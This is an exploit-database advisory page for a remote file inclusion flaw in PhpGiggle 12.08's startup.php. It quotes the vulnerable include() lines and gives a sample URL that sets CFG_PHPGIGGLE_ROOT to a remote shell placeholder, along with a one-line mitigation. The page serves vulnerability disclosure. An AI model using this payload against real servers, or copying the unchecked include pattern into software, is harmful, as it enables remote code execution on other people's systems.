header-logo
Suggest Exploit
vendor:
PhpGiggle
by:
ajann
7,5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: PhpGiggle
Affected Version From: 12.08
Affected Version To: 12.08
Patch Exists: YES
Related CWE: N/A
CPE: a:phpgiggle:phpgiggle
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Php Giggle <= 12.08 Remote File Include Vulnerability

The vulnerability exists in the startup.php file, which allows an attacker to include a remote file by manipulating the CFG_PHPGIGGLE_ROOT parameter. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing an arbitrary file from a remote server.

Mitigation:

Ensure that user input is validated and filtered before being used in a file include statement.
Source

Exploit-DB raw data:

*******************************************************************************
# Title  :  Php Giggle  <= 12.08 Remote File Include Vulnerability

# Author :   ajann

# Vuln;

*******************************************************************************
[File]
startup.php
[/File]

[Code,1]
startup.php Error:

..
....
include($CFG_PHPGIGGLE_ROOT . $CFG_MODULE_ROOT .
"/kernel/system/modregistry.inc.php");
include($CFG_PHPGIGGLE_ROOT . $CFG_MODULE_ROOT .
"/kernel/public/msg.func.php");
include($CFG_PHPGIGGLE_ROOT . $CFG_MODULE_ROOT .
"/kernel/public/fileio.func.php");

       //once the file I/O wrapper is brought up, it is convenient to use
       //function fileInclude
....
..

Key [:] CFG_PHPGIGGLE_ROOT=[file]

\Example:

http://target.com/path/modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=[Shell]

# ajann,Turkey
# ...
# Im not Hacker!

http://www.comscripts.com/scripts/php.phpgiggle.565.html =>      Télécharger

# milw0rm.com [2006-11-06]